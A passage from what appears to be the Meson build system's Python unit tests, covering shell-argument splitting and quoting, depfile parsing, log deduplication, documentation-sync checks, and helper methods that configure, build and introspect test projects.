                (r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
                (r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
                (r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
                (r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
                (r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
                (r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
                (r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
                (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
                (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
                (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
            ]
        else:
            test_data = [
                (r"'a b c' d e", ['a b c', 'd', 'e'], True),
                (r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
                (r"a\b\c d e", [r'abc', 'd', 'e'], False),
                (r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
                (r'"a b c" d e', ['a b c', 'd', 'e'], False),
                (r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
                (r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
                (r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
                (r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
                (r"'a & b & c d e'", ['a & b & c d e'], True),
                (r"abd'e f'g h", [r'abde fg', 'h'], False),
                ('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
                ('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
                ("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
                ('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
                ("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
            ]
        for (cmd, expected, roundtrip) in test_data:
            self.assertEqual(split_args(cmd), expected)
            if roundtrip:
                self.assertEqual(join_args(expected), cmd)
    def test_quote_arg(self):
        """quote_arg() must quote a single argument for the platform shell
        so that split_args() recovers the original exactly; each case is
        (raw_argument, expected_quoted_form)."""
        split_args = mesonbuild.mesonlib.split_args
        quote_arg = mesonbuild.mesonlib.quote_arg
        if is_windows():
            test_data = [
                ('', '""'),
                ('arg1', 'arg1'),
                ('/option1', '/option1'),
                ('/Ovalue', '/Ovalue'),
                ('/OBob&Alice', '/OBob&Alice'),
                ('/Ovalue with spaces', r'"/Ovalue with spaces"'),
                (r'/O"value with spaces"', r'"/O\"value with spaces\""'),
                (r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
                ('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
                ('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
                (r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
            ]
        else:
            test_data = [
                ('arg1', 'arg1'),
                ('--option1', '--option1'),
                ('-O=value', '-O=value'),
                ('-O=Bob&Alice', "'-O=Bob&Alice'"),
                ('-O=value with spaces', "'-O=value with spaces'"),
                ('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
                ('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
                ('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
            ]
        for (arg, expected) in test_data:
            self.assertEqual(quote_arg(arg), expected)
            # Round-trip: splitting the quoted form must recover the input.
            self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# linue continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
    def test_log_once_ansi(self):
        """log_once() must deduplicate a message also when it is wrapped
        by mlog.bold(), and mlog.warning(..., once=True) must behave the
        same way."""
        f = io.StringIO()
        with mock.patch('mesonbuild.mlog.log_file', f), \
                mock.patch('mesonbuild.mlog._logged_once', set()):
            mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
            mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
            actual = f.getvalue().strip()
            self.assertEqual(actual.count('foo'), 1, actual)
            # The same text without the bold wrapper still counts as a dup.
            mesonbuild.mlog.log_once('foo')
            actual = f.getvalue().strip()
            self.assertEqual(actual.count('foo'), 1, actual)
            # NOTE(review): truncate() without a preceding seek(0) truncates
            # at the current position, so the buffer is not actually cleared;
            # the 'bar' count below is unaffected either way — confirm intent.
            f.truncate()
            mesonbuild.mlog.warning('bar', once=True)
            mesonbuild.mlog.warning('bar', once=True)
            actual = f.getvalue().strip()
            self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
    """Checks that files shipped in the repository (docs, release-note
    snippets, syntax-highlighting data) stay in sync with the code."""

    def test_snippets(self):
        """Every release-note snippet must be a markdown file whose
        headings use exactly two '#' characters and whose code fences
        are balanced."""
        hashcounter = re.compile('^ *(#)+')
        snippet_dir = Path('docs/markdown/snippets')
        self.assertTrue(snippet_dir.is_dir())
        for f in snippet_dir.glob('*'):
            self.assertTrue(f.is_file())
            if f.parts[-1].endswith('~'):
                # Skip editor backup files.
                continue
            if f.suffix == '.md':
                in_code_block = False
                with f.open() as snippet:
                    for line in snippet:
                        # Indented code blocks are not headings.
                        if line.startswith('    '):
                            continue
                        if line.startswith('```'):
                            in_code_block = not in_code_block
                        if in_code_block:
                            continue
                        m = re.match(hashcounter, line)
                        if m:
                            self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
                self.assertFalse(in_code_block, 'Unclosed code block.')
            else:
                if f.name != 'add_release_note_snippets_here':
                    self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)

    def test_compiler_options_documented(self):
        '''
        Test that C and C++ compiler options and base options are documented in
        Builtin-Options.md. Only tests the default compiler for the current
        platform on the CI.
        '''
        md = None
        with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
            md = f.read()
        self.assertIsNotNone(md)
        env = get_fake_env()
        # FIXME: Support other compilers
        cc = env.detect_c_compiler(MachineChoice.HOST)
        cpp = env.detect_cpp_compiler(MachineChoice.HOST)
        for comp in (cc, cpp):
            for opt in comp.get_options().keys():
                self.assertIn(opt, md)
            for opt in comp.base_options:
                self.assertIn(opt, md)
        # Sanity check that a made-up option name is not in the docs.
        self.assertNotIn('b_unknown', md)

    def test_builtin_options_documented(self):
        '''
        Test that universal options and base options are documented in
        Builtin-Options.md.
        '''
        md = None
        with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
            md = f.read()
        self.assertIsNotNone(md)
        found_entries = set()
        # Pair each '## ...' section with the next one (None sentinel for
        # the last) so the section's content can be sliced out.
        sections = list(re.finditer(r"^## (.+)$", md, re.MULTILINE)) + [None]
        for s1, s2 in zip(sections[:], sections[1:]):
            if s1.group(1) == "Universal options":
                # Extract the content for this section
                end = s2.start() if s2 is not None else len(md)
                content = md[s1.end():end]
                subsections = list(re.finditer(r"^### (.+)$", content, re.MULTILINE)) + [None]
                for sub1, sub2 in zip(subsections[:], subsections[1:]):
                    if sub1.group(1) == "Directories" or sub1.group(1) == "Core options":
                        # Extract the content for this subsection
                        sub_end = sub2.start() if sub2 is not None else len(content)
                        subcontent = content[sub1.end():sub_end]
                        # Find the list entries
                        arches = [m.group(1) for m in re.finditer(r"^\| (\w+) .* \|", subcontent, re.MULTILINE)]
                        # Drop the header
                        arches = set(arches[1:])
                        # No option may be documented in two subsections.
                        self.assertEqual(len(found_entries & arches), 0)
                        found_entries |= arches
                break
        self.assertEqual(found_entries, set([
            *mesonbuild.coredata.builtin_options.keys(),
            *mesonbuild.coredata.builtin_options_per_machine.keys()
        ]))

    def test_cpu_families_documented(self):
        """The CPU families table in Reference-tables.md must list exactly
        the families known to mesonbuild.environment."""
        with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
            md = f.read()
        self.assertIsNotNone(md)
        sections = list(re.finditer(r"^## (.+)$", md, re.MULTILINE))
        for s1, s2 in zip(sections[::2], sections[1::2]):
            if s1.group(1) == "CPU families":
                # Extract the content for this section
                content = md[s1.end():s2.start()]
                # Find the list entries
                arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
                # Drop the header
                arches = set(arches[1:])
                self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))

    def test_markdown_files_in_sitemap(self):
        '''
        Test that each markdown files in docs/markdown is referenced in sitemap.txt
        '''
        with open("docs/sitemap.txt", encoding='utf-8') as f:
            md = f.read()
        self.assertIsNotNone(md)
        toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
        markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
        exceptions = ['_Sidebar.md']
        for f in markdownfiles:
            if f not in exceptions:
                self.assertIn(f, toc)

    def test_vim_syntax_highlighting(self):
        '''
        Ensure that vim syntax highlighting files were updated for new
        functions in the global namespace in build files.
        '''
        env = get_fake_env()
        interp = Interpreter(FakeBuild(env), mock=True)
        with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
            res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
            # The keyword list is backslash-continued; split on '\' and drop
            # the 'syn keyword mesonBuiltin' head.
            defined = set([a.strip() for a in res.group().split('\\')][1:])
            self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))

    @unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
    def test_json_grammar_syntax_highlighting(self):
        '''
        Ensure that syntax highlighting JSON grammar written by TingPing was
        updated for new functions in the global namespace in build files.
        https://github.com/TingPing/language-meson/
        '''
        env = get_fake_env()
        interp = Interpreter(FakeBuild(env), mock=True)
        url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
        try:
            # Use a timeout to avoid blocking forever in case the network is
            # slow or unavailable in a weird way
            r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
        except urllib.error.URLError as e:
            # Skip test when network is not available, such as during packaging
            # by a distro or Flatpak
            if not isinstance(e, urllib.error.HTTPError):
                raise unittest.SkipTest('Network unavailable')
            # Don't fail the test if github is down, but do fail if 4xx
            if e.code >= 500:
                raise unittest.SkipTest('Server error ' + str(e.code))
            raise e
        # On Python 3.5, we must decode bytes to string. Newer versions don't require that.
        grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
        for each in grammar['patterns']:
            if 'name' in each and each['name'] == 'support.function.builtin.meson':
                # The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
                # we convert that to [func1, func2, ...] without using regex to parse regex
                funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
            if 'name' in each and each['name'] == 'support.variable.meson':
                # \\b(builtin1|builtin2...)\\b
                builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
        self.assertEqual(builtin, set(interp.builtin.keys()))
        self.assertEqual(funcs, set(interp.funcs.keys()))

    def test_all_functions_defined_in_ast_interpreter(self):
        '''
        Ensure that all functions defined in the Interpreter are also defined
        in the AstInterpreter (and vice versa).
        '''
        env = get_fake_env()
        interp = Interpreter(FakeBuild(env), mock=True)
        astint = AstInterpreter('.', '')
        self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
class BasePlatformTests(unittest.TestCase):
    def setUp(self):
        """Prepare per-test state: the meson command lines, backend build
        commands, the test-case directories, a saved copy of os.environ
        (restored in tearDown) and a fresh build directory."""
        super().setUp()
        self.maxDiff = None
        src_root = os.path.dirname(__file__)
        src_root = os.path.join(os.getcwd(), src_root)
        self.src_root = src_root
        self.prefix = '/usr'
        self.libdir = 'lib'
        # Get the backend
        # FIXME: Extract this from argv?
        self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
        self.meson_args = ['--backend=' + self.backend.name]
        self.meson_cross_file = None
        self.meson_command = python_command + [get_meson_script()]
        self.setup_command = self.meson_command + self.meson_args
        self.mconf_command = self.meson_command + ['configure']
        self.mintro_command = self.meson_command + ['introspect']
        self.wrap_command = self.meson_command + ['wrap']
        self.rewrite_command = self.meson_command + ['rewrite']
        # Backend-specific build commands
        self.build_command, self.clean_command, self.test_command, self.install_command, \
            self.uninstall_command = get_backend_commands(self.backend)
        # Test directories
        self.common_test_dir = os.path.join(src_root, 'test cases/common')
        self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
        self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
        self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
        self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
        # Misc stuff
        self.orig_env = os.environ.copy()
        # Expected output of a no-op rebuild, used to assert no work was done.
        if self.backend is Backend.ninja:
            self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
        else:
            # VS doesn't have a stable output when no changes are done
            # XCode backend is untested with unit tests, help welcome!
            self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
        self.builddirs = []
        self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs CI will just abort. It is very hard to distinguish
# between CI issue and test bug in that case. Set timeout and fail loud
# instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix,
'--libdir', self.libdir]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args)
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
try:
run_mtest_inprocess(['-C', self.builddir])
finally:
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
    def wipe(self):
        # Remove the whole build directory; the helper retries deletions to
        # work around transient file locks on Windows.
        windows_proof_rmtree(self.builddir)
    def utime(self, f):
        # Bump the mtime of `f` so the next build reprocesses it; the helper
        # first waits/adjusts as needed for the backend to detect the change.
        ensure_backend_detects_changes(self.backend)
        os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
clre = re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE)
linkre = re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE)
self.assertNotRegex(ret, clre)
self.assertNotRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
    '''
    Tests that should run on all platforms
    (no OS-, compiler-, or backend-specific requirements).
    '''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
